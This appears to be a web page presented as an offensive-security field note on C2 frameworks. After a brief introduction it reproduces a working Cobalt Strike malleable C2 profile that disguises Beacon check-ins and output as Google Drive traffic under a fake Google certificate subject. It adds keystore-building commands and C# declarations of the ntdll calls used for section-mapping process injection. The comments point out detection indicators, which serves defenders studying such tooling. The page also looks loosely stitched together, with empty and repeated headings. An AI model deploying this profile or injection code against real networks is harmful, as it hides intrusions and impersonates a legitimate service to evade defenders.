
C2 Frameworks

C2 Frameworks is presented here as a field note for offensive security work. The emphasis is on attack surface, validation logic, common failure patterns, operator choices and the public references worth keeping nearby during a live assessment.

field note · assessment reference · public sources

Why it matters in practice

C2 Frameworks matters because it shapes how an operator scopes the work, chooses validation steps, prioritizes evidence and explains risk. The point is not to accumulate trivia; it is to understand which control boundary is in play and how that boundary can fail under realistic pressure.

This note keeps C2 frameworks tied to offensive workflow: what to observe, what to prove, what usually goes wrong, and which references remain useful once an assessment moves from planning into active validation.

Primary coverage

The items below mark the main workflows, concepts, tools and validation themes that repeatedly matter when working through C2 frameworks.

  • C2 frameworks
  • PoshC2
  • Havoc C2 framework
  • Brute Ratel
  • Cobalt Strike
  • Start the Cobalt Strike team server without a custom C2 profile
  • Start the Cobalt Strike client
  • On teamserver connect
  • Cobalt Strike dashboard
  • Listener create

Selected public references

#
# Google Drive
# 
# Author: @bluscreenofjeff
#

#set https cert info
# Subject fields for the certificate the team server generates for its HTTPS
# listener. The values imitate Google's certificate subject, but a certificate
# built from this block is self-signed (unless a keystore holding a CA-issued
# certificate is configured instead), so it does not chain to a public CA and
# does not match the certificate Google actually serves. TLS inspection that
# compares subject, issuer and chain can flag that mismatch.
https-certificate {
    set CN       "*.google.com"; #Common Name
    set O        "Google Inc"; #Organization Name
    set C        "US"; #Country
    set L        "Mountain View"; #Locality
    set ST       "California"; #State or Province
    set validity "365"; #Number of days the cert is valid for
}

#default Beacon sleep duration and jitter
# sleeptime is in milliseconds (60000 = 60 s) and jitter is a percentage.
# Together they produce near-periodic check-ins about one minute apart, which
# is the pattern beaconing analytics over proxy or flow logs are built to find.
set sleeptime "60000";
set jitter    "20";

#default useragent for HTTP comms
# A fixed Internet Explorer 11 / Windows 7 string. A User-Agent that never
# varies and does not match the browser or OS actually present on the endpoint
# is a useful pivot in proxy logs.
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

#IP address used to indicate no tasks are available to DNS Beacon
# Many lookups under one domain that all answer with this same address are
# worth hunting for in DNS logs.
set dns_idle "8.8.4.4";

#Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep "0";

#Maximum length of hostname when uploading data over DNS (0-255)
# Long, high-entropy query names approaching this length indicate data being
# carried inside DNS lookups.
set maxdns    "235";

# Shape of the check-in transaction (Beacon asks for tasks). Observable on the
# wire: a fixed URI, a fixed Host header, a fixed Cookie value and two query
# parameters ("id" and "u").
http-get {

    set uri "/viewerng/meta";

    client {

        header "Accept" "text/html,application/xml;*/*;";
        header "Accept-Encoding" "gzip, deflate";
        # The Host header is a literal string; comparing it with the resolved
        # destination address and the TLS SNI exposes a mismatch when the
        # traffic is not really going to Google.
        header "Host" "drive.google.com";
        # Static cookie: the same SID value appears on every request from every
        # host using this profile, so it works as an exact-match indicator.
        header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

        #session metadata
        # Encoded as base64url -> netbios -> base64url, then placed in the
        # query parameter "id".
        metadata {
            base64url;
            netbios;
            base64url;
            parameter "id";
        }

        # Constant query parameter u=0 added to every check-in.
        parameter "u" "0";
    }

    # Response headers returned by the team server; they appear modelled on a
    # Google response (Server: GSE, attachment named json.txt).
    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
        header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
        header "X-Content-Type-Options" "nosniff";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-XSS-Protection" "1; mode=block";
        header "Server" "GSE";
        header "Connection" "close";


        #Beacon's tasks
        # print: the task data is sent as the response body with no further
        # transform declared here, although the response is labelled
        # application/json.
        output {
            print;
        }
    }
}

# Shape of the transaction that returns Beacon output to the team server.
# The verb is overridden to GET, so output is carried in the query string
# rather than a request body; unusually long GET query strings to this path
# are an indicator. The URI differs from the http-get URI by one letter
# ("viewersng" here, "viewerng" there).
http-post {
    
    set uri "/viewersng/meta";
    set verb "GET";
    
    client {

        header "Accept" "text/html,application/xml;*/*;";
        header "Accept-Encoding" "gzip, deflate";
        header "Host" "drive.google.com";
        # Same static SID cookie value as in the http-get block.
        header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";


        # Beacon output: base64url -> netbios -> base64url, placed in the
        # query parameter "id".
        output {
            base64url;
            netbios;
            base64url;
            parameter "id";
        }

        #session ID
        # Sent in the query parameter "u" with no transform declared.
        id {
            parameter "u";
        }
    }

    # Response headers are identical to those in the http-get server block.
    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
        header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
        header "X-Content-Type-Options" "nosniff";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-XSS-Protection" "1; mode=block";
        header "Server" "GSE";
        header "Connection" "close";


        output {
            print;
        }
    }
}

#change the stager server
# Only the response headers for stage delivery are set here; no URI or client
# block is declared in this profile for the stager. The response is labelled
# application/json, so a large binary body under that Content-Type is a
# mismatch that content inspection can pick up.
http-stager {
    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
    }
}
# Bundle the certificate (public.crt) and its private key (private.key) into a
# PKCS#12 archive. No password option is given, so openssl prompts for the
# export password interactively.
openssl pkcs12 -export \
    -in public.crt \
    -inkey private.key \
    -out c2_profile.pkcs12

# Import that archive into the keystore file c2_profile.store, using keytool's
# default destination store type. keytool prompts for the source and
# destination passwords.
keytool -importkeystore \
    -srcstoretype pkcs12 \
    -srckeystore c2_profile.pkcs12 \
    -destkeystore c2_profile.store
using System;
using System.Runtime.InteropServices;

namespace NtMapViewOfSection
{
    /// <summary>
    /// P/Invoke declarations for three native API exports of ntdll.dll:
    /// NtCreateSection, NtMapViewOfSection and NtCreateThreadEx.
    /// </summary>
    /// <remarks>
    /// Every function returns a <c>uint</c>, presumably the NTSTATUS code; no exception is
    /// raised on failure, so callers have to inspect the return value.
    /// Defenders commonly meet this import set in section-mapping process injection
    /// (MITRE ATT&amp;CK T1055). The calls go to ntdll.dll directly, so detection should not
    /// depend on monitoring of higher-level Win32 wrappers; kernel-sourced telemetry such as
    /// remote thread creation events (for example Sysmon Event ID 8) and a managed binary
    /// importing these three exports are the more reliable signals.
    /// </remarks>
    internal class Native
    {
        /// <summary>
        /// Declares ntdll's NtCreateSection, which creates a section object and returns its
        /// handle through <paramref name="SectionHandle"/>.
        /// </summary>
        /// <remarks>
        /// The access, protection and allocation arguments are raw <c>uint</c> values with no
        /// named constants in this class; their meaning is defined by the native API, not here.
        /// </remarks>
        [DllImport("ntdll.dll")]
        public static extern uint NtCreateSection(
            ref IntPtr SectionHandle,
            uint DesiredAccess,
            IntPtr ObjectAttributes,
            ref ulong MaximumSize,
            uint SectionPageProtection,
            uint AllocationAttributes,
            IntPtr FileHandle);

        /// <summary>
        /// Declares ntdll's NtMapViewOfSection, which maps a view of the section identified by
        /// <paramref name="SectionHandle"/> into the process identified by
        /// <paramref name="ProcessHandle"/>.
        /// </summary>
        /// <remarks>
        /// The mapped address and view size come back through the two <c>out</c> parameters.
        /// A view mapped into a process other than the caller is the cross-process step
        /// that endpoint telemetry should record.
        /// </remarks>
        [DllImport("ntdll.dll")]
        public static extern uint NtMapViewOfSection(
            IntPtr SectionHandle,
            IntPtr ProcessHandle,
            out IntPtr BaseAddress,
            IntPtr ZeroBits,
            IntPtr CommitSize,
            IntPtr SectionOffset,
            out ulong ViewSize,
            uint InheritDisposition,
            uint AllocationType,
            uint Win32Protect);

        /// <summary>
        /// Declares ntdll's NtCreateThreadEx, which creates a thread in the process identified
        /// by <paramref name="processHandle"/> starting at <paramref name="startAddress"/> and
        /// returns the thread handle through <paramref name="threadHandle"/>.
        /// </summary>
        /// <remarks>
        /// When the process handle refers to another process this is remote thread creation,
        /// which kernel thread-creation notifications report regardless of which user-mode
        /// API was used.
        /// </remarks>
        [DllImport("ntdll.dll")]
        public static extern uint NtCreateThreadEx(
            out IntPtr threadHandle,
            uint desiredAccess,
            IntPtr objectAttributes,
            IntPtr processHandle,
            IntPtr startAddress,
            IntPtr parameter,
            bool createSuspended,
            int stackZeroBits,
            int sizeOfStack,
            int maximumStackSize,
            IntPtr attributeList);

    }
}

Selected public references